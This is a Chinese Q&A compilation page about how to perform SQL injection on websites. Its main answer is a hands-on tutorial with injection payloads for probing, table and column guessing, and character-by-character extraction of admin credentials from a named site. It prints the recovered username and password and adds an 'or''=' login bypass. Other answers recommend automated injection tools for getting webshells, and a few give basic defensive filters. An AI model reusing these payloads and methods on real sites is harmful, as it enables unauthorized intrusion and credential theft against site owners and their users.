當前位置:首頁 » 網站資訊 » 網站怎麼注入
擴展閱讀
怎麼提高圖片網站的響應 2025-01-22 18:53:15
usb網路共享被識別為 2025-01-22 18:49:19

網站怎麼注入

發布時間: 2022-02-13 12:12:54

① .html的網站怎麼注入

就在你要注入的網站後加後綴.html就可以了

如何在網頁裡面注入代碼

utf-8的編碼吧
首先找到你的備份文件,將TOP,HEAD,FOOT,CONN,之類的常用文件名改個名,稍復雜點他就找不到了,這種注入都是自動批量的注入,沒有什麼針對性,然後將改過名的文件包含到網頁中。
這是治標,治本的話,還是要從程序結構,語句,上傳這三塊著手。

③ 怎麼注入網站

明小子3.6或者啊D都可以的,想學黑客嗎?

④ 怎麼可以找可以注入的網站

用啊D,另外手工注入方法:
實例:_blank>http://www.XXX.com/jiaren.asp?ID=544

好下面開始了.....

1.判斷

用' ;
用 and 1=1 and 1=2

判斷是很重要並且最主要的一步,因為如果你手工注入不判斷那麼怎麼繼續呢..
============================================================================
' 返回

Microsoft JET Database Engine 錯誤 '80040e14'

語法錯誤 (操作符丟失) 在查詢表達式 'ID = 544''' 中。

/jiaren.asp,行15

============================================================================

; 返回正常頁面

===============================
and 1=1 返回正常頁面

================================
and 1=2 返回錯誤頁面

編號:

ADODB.Field 錯誤 '800a0bcd'

BOF 或 EOF 中有一個是"真",或者當前的記錄已被刪除,所需的操作要求一個當前的記錄。

/jiaren.asp,行28
==============================================================================

上面我們進行了簡單的判斷,可以知道該頁面存在注入.這個時候會有很多朋友要問,這樣為什麼就存在注入呢.呵呵你只要記住我們就是靠返回頁面的不同來判斷的.只有它兩次返回頁面不相同那麼就可以知道存在了.

2.猜表
and 0<>(select count(*) from *)
這個就最基礎,最大眾話的查詢語句了.至於語句的作用我會給大家說明.但是具體的意思請大家自行找有關SQL查詢的資料看.

and 0<>(select count(*) from admin) ---判斷是否存在admin這張表

其中admin是可以換的,其他部分不要換.
我們剛剛返回的是正確頁面說明存在admin這張表.如果返回錯誤說明不存在,那麼我們就要換其他的.如: and 0<>(select count(*) from user) 當然啦,只要你想到都可以試試.那天我在課上我給了大家兩個提示,沒有想到很多人居然就知道這兩個了.還問我把admin , user 換成其他的可不可以.同志們,這個admin user 是可以替換的.但是,不是隨便換你要想一下平時人家都是用什麼名稱來做表名.因為你是在猜表,也要有思路的猜不是亂猜.換成123 456 那有用嗎.沒有用因為沒有誰會用這個去做表的名稱.
一般的表的名稱無非是admin adminuser user pass password 等..

3.猜帳號數目
and 0<(select count(*) from admin)
大家會發現和上面的語句差不多.呵呵其實查詢部分就是一樣不同的是前面的數字.這個數字就是去看看有幾個用戶帳號.是要換的哦.不是固定是1..因為我們是猜呀.也就是現在我們也不知道它表裡面數據到底有幾個帳號所以要猜,如果固定的那麼就不叫猜了呵呵..
1< 就是說看看 1是不是小於裡面的帳號數目 如果返回的頁面是正確的說明是對的,如果錯誤的說明不是的那麼我們就要換成 2< 3< ..... 當然啦你也可以用1> 2> 來猜.
如果遇到0< 返回正確頁面 1<返回錯誤頁面說明帳號數目就是1個 具體的數學上面判斷大小不會要我去教你們了吧.
下面我做給你們看,這里我是從0開始判斷 呵呵返回正確頁面肯定會返回的因為裡面不可能一個管理員帳號都沒有的. 返回錯誤了哦.說明什麼他裡面就只有一個管理員帳號.我們換成1=看看是不是 OK返回正確頁面說明是的.
如果裡面有幾個帳號這個時候大家就要知道具體猜哪個帳號了.

4.猜解欄位名稱
and 1=(select count(*) from admin where len(name)>0) 用戶欄位名稱

and 1=(select count(*) from admin where len(password)>0) 密碼欄位名稱

猜解表裡面的欄位名稱了
and 1=(select count(*) from admin where len(*)>0)--- 這個是核心語句哦也是大眾話的語句.我們要做的就是在len( ) 括弧裡面加上我們想到的欄位名稱.

我們先來猜用戶名欄位 我用的是 name OK對了.那麼下面我們就來猜密碼欄位了.
我先用pass 暈死不是的,那麼我們再換成password看看 ok對了.
那麼用戶欄位和密碼欄位我們都猜解出來了.下面就是猜解長度和具體的字元了.

5.猜解各個欄位的長度
猜解長度就是把
and 1=(select count(*) from admin where len(*)>0)

>0 換成其他的只道猜到=?返回正確頁面為止,好,下面我們開始吧.
首先是帳號長度...剛剛帳號欄位是name
and 1=(select count(*) from admin where len(name)>0) 正確
and 1=(select count(*) from admin where len(name)>1) 正確
and 1=(select count(*) from admin where len(name)>2) 正確
and 1=(select count(*) from admin where len(name)>6) 錯誤
and 1=(select count(*) from admin where len(name)>5) 正確
and 1=(select count(*) from admin where len(name)>4) 正確
那麼我們就可以知道長度是 6
and 1=(select count(*) from admin where len(name)=6) 正確
呵呵對了吧,=6返回的是正確頁面.

下面是密碼欄位的長度
and 1=(select count(*) from admin where len(password)>0) 正確
and 1=(select count(*) from admin where len(password)>6) 正確
and 1=(select count(*) from admin where len(password)>10) 正確
and 1=(select count(*) from admin where len(password)>15) 錯誤
and 1=(select count(*) from admin where len(password)>14) 錯誤
and 1=(select count(*) from admin where len(password)>13) 錯誤
and 1=(select count(*) from admin where len(password)>12) 錯誤
and 1=(select count(*) from admin where len(password)>11) 正確
OK長度是 12

name 6
password 12

長度出來了,下面就是具體的字元了

6.猜解字元
and 1=(select count(*) from admin where left(name,1)='a') ---猜解用戶
and 1=(select count(*) from admin where left(password,1)='a')
就這樣一次加一個字元這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了

and 1=(select count(*) from admin where left(pass,1)='a') ---猜解密碼

left(name,1)='a' 注意了 1的位置就是你要猜解的字元的位置.
and 1=(select count(*) from admin where left(name,1)='a') ---猜解用戶帳號的第一位
and 1=(select count(*) from admin where left(name,2)='ab')---猜解用戶帳號的第二位
就這樣下去只到猜玩為止.

and 1=(select count(*) from admin where left(name,1)='a') 錯誤
.....
and 1=(select count(*) from admin where left(name,6)='pclzyq')
因為這個猜解過程比較漫長所以我就直接給出答案了.

and 1=(select count(*) from admin where left(password,1)='a') 錯誤
.......
and 1=(select count(*) from admin where left(password,12)='pclzyq000215')
直接給出了答案.

name = pclzyq
password = pclzyq000215

7.找出登陸口,進行登陸
一般的登陸口:
admin.asp
admin_index.asp
admin/index.asp
admin/admin.asp
....
大家可以自己去積累..積累多了不要忘了做成文本文件傳給我哦.^_^

我們這里登陸口是 _blank>http://www.talewin.com/admin.asp 下面就是進行登陸了.

呵呵,後台簡單吧寫這個程序的人估計也很簡單因為他這個登陸口還存在另外一個問題.
用 'or''=' 進行登陸看看 , 看見了吧也可以進去哦.呵呵

說明:

命令:select
中文意思:選擇
說明:用於找出合乎條件的記錄

加總函數:COUNT
中文意思:數量
說明:用於求指定的數量

子句:FROM
中文意思:數據表
說明:用於指定數據表

子句:where
中文意思:條件
說明:用於設定條件

運算符:AND
中文意思:並且
說明:邏輯且

TOP --取出前面的指定長度數據
select top 10 * from .....

and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 這個查詢語句可以猜解中文的用戶和密碼.只要大家把後面的數字換成中文的ASSIC碼就OK.最後把結果再轉換成字元.

⑤ 如何注入網站

要看是不是有可注入點,如果沒有的話,也是沒有辦法的!如果有的話,你直接弄一個頁面來就OK了!

⑥ 網站注入需要哪些知識

簡單的,通過類型識別來防
'SQL安全檢測函數
Function CheckStr(str,strType)
Dim strTmp
strTmp = ""
If strType ="s" Then
strTmp = Replace(Trim(str),"'","''")
strTmp = Replace(strTmp,";","")
ElseIf strType="i" Then
If IsNumeric(str)=False Then str=False
strTmp = str
Else
strTmp = str
End If
CheckStr= strTmp
End Function

把這函數放在你頁面代碼里,你的接收參數可以這樣寫
<%
yxzy=CheckStr(Request("yxzy"),"s")
%>

上面是指字元串型,如果你的參數是數字型,比方id
<%
id=Request("id")
%>
那麼安全的,你可以這么寫:
yxzy=CheckStr(Request("yxzy"),"i")

用這個函數就可以過濾sql注入。
復雜的,可以過濾關鍵字和通過正則表達式來識別

程序可以看到源代碼,很適合學習

SQL通用防注入程序 v3.1 最終紀念版
http://js.down.chinaz.com/Z2006O999/%C6%E4%CB%FC%C0%E0%B1%F0/FySqlX3.1.rar
用這個吧``裡面有使用說明``很簡單的``

neeao.txt文件里有說明,使用方法很簡單,,
只要在需要防注入的頁面頭部用
<!--#Include File="Neeao_SqlIn.Asp"-->
就可以做到頁面防注入~~
如果想整站防注,就在網站的一個公用文件中,如資料庫鏈接文件conn.asp中!
添加<!--#Include File="Neeao_SqlIn.Asp"-->來調用本軟體
需要注意的是,在添加到資料庫連接文件中,為了不和程序發生沖突,
需添加在文件代碼的最底部!

⑦ 如何找到網站的注入點

這個問題好龐大和抽象,找注入點,一般最簡單的方法就是在有類似?id=4的後面加上and 1=1返回正常 和 and 1=2,返回錯誤頁面,那就可以初步斷定存在注入點,至於進一步的得到更多的信息和進後台或者拿webshell就要說一大堆了,沒必要復制粘貼在這里,你自己去搜索吧
當然,以上是指用手工注入。
不過現在的人都懶了,來做黑客也是,所以都用工具了,你可以用啊d,nbsi,明小子等等專門掃漏洞的工具來掃描。拿到webshell是非常簡單的事情,但是提權通常就異常艱巨,現在的網站的許可權都設置的比較變態。一句話說不清,要交流的話,可以加我

⑧ 什麼是網站注入

所謂網站注入點是程序員SQL語句編寫不嚴謹造成的漏洞。
通過該漏洞可以利用瀏覽器地址欄執行SQL語句來獲取網站的WEBSHELL。

注入點的檢測,最常用的方法是在網站ID後面加英文狀態下的'號來檢測的
例如你網站有這樣一個地址:
http://www.youname.com/article.asp?id=1
在ID=1後面加'號:
http://www.youname.com/article.asp?id=1'
如提示「acticle.asp 第xx行出現錯誤」之類的話,則說明該網站存在SQL注入。

也可以通過在ID後面加對比
http://www.youname.com/article.asp?id=1 and 1=1
http://www.youname.com/article.asp?id=1 and 1=2
如果第一次沒有顯示錯誤,而第二次顯示了錯誤,也說明該網站存在SQL注入

轉載來的

⑨ .html的網站怎麼做sql注入

所謂SQL注入,就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字元串,最終達到欺騙伺服器執行惡意的SQL命令。
永遠不要信任用戶的輸入,必須認定用戶輸入的數據都是不安全的,對用戶輸入的數據都需要進行過濾處理。

sql注入的檢測方法一般採取輔助軟體或網站平台來檢測,軟體一般採用sql注入檢測工具jsky,網站平台就有億思網站安全平台檢測工具。MDCSOFT SCAN等。採用MDCSOFT-IPS可以有效的防禦SQL注入,XSS攻擊等。